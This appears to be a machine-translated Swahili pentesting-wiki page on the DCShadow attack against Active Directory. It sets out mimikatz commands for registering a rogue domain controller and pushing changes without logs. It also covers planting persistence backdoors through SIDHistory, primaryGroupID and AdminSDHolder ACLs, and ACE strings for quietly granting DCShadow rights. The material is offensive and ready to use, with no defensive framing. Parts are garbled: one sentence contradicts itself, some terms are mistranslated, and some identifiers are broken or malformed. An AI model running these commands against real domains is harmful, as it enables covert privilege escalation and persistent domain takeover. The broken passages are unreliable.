DCShadow

Inasajili Domain Controller mpya katika AD na inaitumia ku sukuma sifa (SIDHistory, SPNs...) kwenye vitu vilivyotajwa bila kuacha kumbukumbu yoyote kuhusu mabadiliko. Unahitaji uwe na mamlaka ya DA na uwe ndani ya kikoa cha msingi. Tafadhali kumbuka kuwa ikiwa utatumia data mbaya, kumbukumbu mbaya sana zitaonekana.

Kufanya shambulio hilo, unahitaji mifano 2 ya mimikatz. Moja wao itaanza seva za RPC na mamlaka ya SYSTEM (unapaswa kuonyesha hapa mabadiliko unayotaka kufanya), na mfano mwingine utatumika kusukuma thamani:

!+
!processtoken
lsadump::dcshadow /object:username /attribute:Description /value="My new description"

lsadump::dcshadow /push

Tambua kwamba elevate::token haitafanya kazi katika kikao cha mimikatz1 kwani inaongeza mamlaka ya mchakato, lakini tunahitaji kuongeza mamlaka ya mchakato. Unaweza pia kuchagua na "LDAP" kitu: /object:CN=Administrator,CN=Users,DC=JEFFLAB,DC=local

Unaweza kusukuma mabadiliko kutoka kwa DA au kutoka kwa mtumiaji na ruhusa ndogo hii:

• Katika kitu cha kikoa:

• DS-Install-Replica (Ongeza/Ondoa Nakala katika Kikoa)

• DS-Replication-Manage-Topology (Simamia Topolojia ya Uzalishaji)

• DS-Replication-Synchronize (Uzalishaji wa Uzalishaji)

• Kitu cha eneo (na watoto wake) katika chombo cha Configuration:

• CreateChild na DeleteChild

• Kitu cha kompyuta ambayo imeandikishwa kama DC:

• WriteProperty (Sio Andika)

• Kitu cha lengo:

• WriteProperty (Sio Andika)

Unaweza kutumia Set-DCShadowPermissions kutoa ruhusa hizi kwa mtumiaji asiye na mamlaka (tambua kwamba hii itaacha baadhi ya magogo). Hii ni kizuizi zaidi kuliko kuwa na mamlaka ya DA. Kwa mfano: Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose Hii inamaanisha kuwa jina la mtumiaji student1 wakati anapoingia katika kifaa cha mcorp-student1 ana ruhusa za DCShadow juu ya kitu cha root1user.

Kutumia DCShadow kuunda milango ya nyuma

lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:S-1-521-280534878-1496970234-700767426-519

lsadump::dcshadow /object:student1 /attribute:primaryGroupID /value:519

#First, get the ACE of an admin already in the Security Descriptor of AdminSDHolder: SY, BA, DA or -519
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=Admin SDHolder,CN=System,DC=moneycorp,DC=local")).psbase.Objec tSecurity.sddl
#Second, add to the ACE permissions to your user and push it using DCShadow
lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local /attribute:ntSecurityDescriptor /value:<whole modified ACL>

Shadowception - Toa ruhusu za DCShadow kwa kutumia DCShadow (hakuna kumbukumbu zilizobadilishwa za ruhusu)

Tunahitaji kuongeza ACE zifuatazo na SID ya mtumiaji mwishoni:

• Kwenye kipengele cha kikoa:

• (OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)

• (OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;UserSID)

• (OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)

• Kwenye kipengele cha kompyuta ya mshambuliaji: (A;;WP;;;UserSID)

• Kwenye kipengele cha mtumiaji wa lengo: (A;;WP;;;UserSID)

• Kwenye kipengele cha Maeneo katika chombo cha Configuration: (A;CI;CCDC;;;UserSID)

Ili kupata ACE ya sasa ya kipengele: (New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=loca l")).psbase.ObjectSecurity.sddl

Tambua kuwa katika kesi hii unahitaji kufanya mabadiliko mengi, sio moja tu. Kwa hivyo, katika kikao cha mimikatz1 (seva ya RPC) tumia parameter /stack na kila mabadiliko unayotaka kufanya. Kwa njia hii, utahitaji tu /push mara moja ili kutekeleza mabadiliko yote yaliyokwama kwenye seva ya udanganyifu.

Maelezo zaidi kuhusu DCShadow katika ired.team.